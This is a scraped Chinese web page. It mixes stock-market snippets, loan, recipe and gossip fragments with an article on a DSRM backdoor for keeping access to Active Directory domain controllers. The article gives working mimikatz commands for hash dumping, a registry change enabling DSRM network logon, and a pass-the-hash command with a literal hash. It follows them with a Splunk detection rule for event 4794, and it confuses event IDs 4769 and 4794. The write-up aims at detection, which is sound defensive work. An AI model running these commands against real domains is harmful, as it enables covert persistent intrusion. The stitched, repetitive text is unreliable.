全球资讯:裕元集团(00551.HK):12月综合经营收益净额6.3亿美元
格隆汇1月10日丨裕元集团发布公告,2022年12月,公司本月综合经营收益净额(即相当于总销售额减销售折扣及销售退货)6 30亿美元。公司截至2022年
01、简介
每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。
【资料图】
域内权限维持的方式有很多,每增加一条安全检测规则,就多一层安全保障。针对DSRM后门,基于AD Event日志能够帮助我们提供什么维度的检测,我们通过一个后门利用实例来看一下。
02、利用方式
(1)获取域内用户Hash
使用mimikatz查看域内用户test的NTLM Hash。
mimikatz # privilege::debugmimikatz # lsadump::lsa /patch /name:test
(2)将DSRM帐户和域用户的NTLM Hash同步
使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。
(3)抓取DSRM密码
因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。
mimikatz#privilege::debugmimikatz # token::elevatemimikatz # lsadump::sam
(4)修改DSRM登录方式
DSRM 有三种登录方式,具体如下:
0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器
如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。
修改注册表:
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
(5)使用DSRM远程登录
在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。
mimikatz # privilege::debugmimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040
03、攻击检测
当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。
4794事件:每次更改目录还原模式(DSRM)管理员密码时,就会生成此事件,包含SID和帐户名,以及调用方工作站。
安全规则:
index=ad EventCode=4794 | stats count earliest(_time) AS start_time latest(_time) AS end_time by dest user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,域控服务器:"+dest +" 疑似DSRM域后门行为,试图设置目录服务还原模式管理员密码"+count+"次,操作账号:"+user| table start_time end_time user message
安全告警效果如下图:
格隆汇1月10日丨裕元集团发布公告,2022年12月,公司本月综合经营收益净额(即相当于总销售额减销售折扣及销售退货)6 30亿美元。公司截至2022年
40人的茶话会应该多准备一些嗯,水果啊,糕点呢。还有毛嗑儿啊,这些可以让大伙儿呢边喝茶的同时边吃水果边吃糕点,然后跟互相探讨一些问题,
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator
1月9日3D感应板块较上一交易日上涨0 4%,永新光学领涨。当日上证指数报收于3176 08,上涨0 58%。深证成指报收于11450 15,上涨0 72%。3D感应板
网贷逾期一般会上征信,有些借贷机构在用户逾期后一天后就会上报给征信机构,而有些借贷机构则是会在几天后上报给征信机构,因为有些借贷机构可
408X亮相,那个不拘一格敢为人先的标致,又回来了!
职工因工致残被鉴定为五级、六级伤残的,享受以下待遇:(一)从工伤保险基金按伤残等级支付一次性伤残补助金,标准为:五级伤残为18个月的本
本文作者从自身工作实践出发,梳理总结了PRD撰写上需要注意的几个问题,与大家分享。01原以为恰到好处的描述,或许不是最佳表达方式怎么在PRD
针对部分新冠病毒感染者恢复期的不适症状以及营养干预和指导需求,北京佑安医院中西医结合新冠康复门诊和新冠营养门诊昨天(5日)正式开诊。记
1、山药叶可以凉拌着吃。山药叶子具有益气补脾,美容养颜的功效,所以能吃,但需要洗净。2、若是要食用山药的叶片,选取健壮的叶片进行采摘。洗
提价、跌价、断货、拍卖破纪录
2022年12月30日晚20:00,以“共生、共荣、共赢”为主题的鸿鹄中国2023年度线上年会暨鸿鹄中国白皮书发布会在山东日照隆重举办。并以此为背景深
阳光玫瑰属于水果中的佼佼者,其果实集清香、果香、花香于一身,果粒着生紧密,果肉鲜脆多汁,带有玫瑰香味,并且阳光玫瑰在每年8月成熟,夏季
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤离离原上草,一岁一枯荣。大家好,
中信建投证券股份有限公司关于江苏帝奥微电子股份有限公司2022年度持续督导工作现场检查报告上海证券交易所:中信建投证券股份有限公司(以下
截至2023年1月6日收盘,人民同泰(600829)报收于6 43元,下跌2 13%,换手率1 13%,成交量6 54万手,成交额4248 37万元。
以下是西藏旅游在北京时间1月6日14:47分盘口异动快照:1月6日,西藏旅游盘中跌幅达5%,截至14点47分,报12 16元,成交1 26亿元,换手率4 50%。
2023年景区退出公告因小雷山、雷山温泉、三里畈沙雕公园景区长期闭园,且合同到期,2023年1月1日起将退出大武汉旅游年卡。东湖皮划艇景区与武
服装的价值是人们赋予的,穿搭能否将高级感呈现出来关键还得看技巧。因为“搭配”二字是打造时尚穿搭的关键所在,用好服装才能满足搭配诉求。
跨年夜才刚过去没多久,娱乐圈又曝出一大猛料,据悉,一位Z姓老艺术家被曝婚内多次出轨,私生活混乱不堪,与其多年塑造的人设完全不符,甚至他
截至2023年1月4日收盘,利和兴(301013)报收于9 5元,上涨7 83%,换手率10 84%,成交量18 01万手,成交额1 69亿元。
12月15日上午,市爱卫办专家组会同区健康促进中心一行赴品尊国际社区,就健康居委试点建设进行实地考核评估。近年来,品尊居委会坚持党建引领
中来股份官微1月4日消息,1月3日,中来股份总裁林建伟一行拜访北京能源国际控股有限公司总裁朱军,双方就新能源领域深入合作进行座谈交流。后
12月28日,三峡集团宣布一批新能源和长江大保护项目集中开工,27个开工项目规划总投资达1090 55亿元,总装机规模1963 68万千瓦,涉及三峡集团6个二级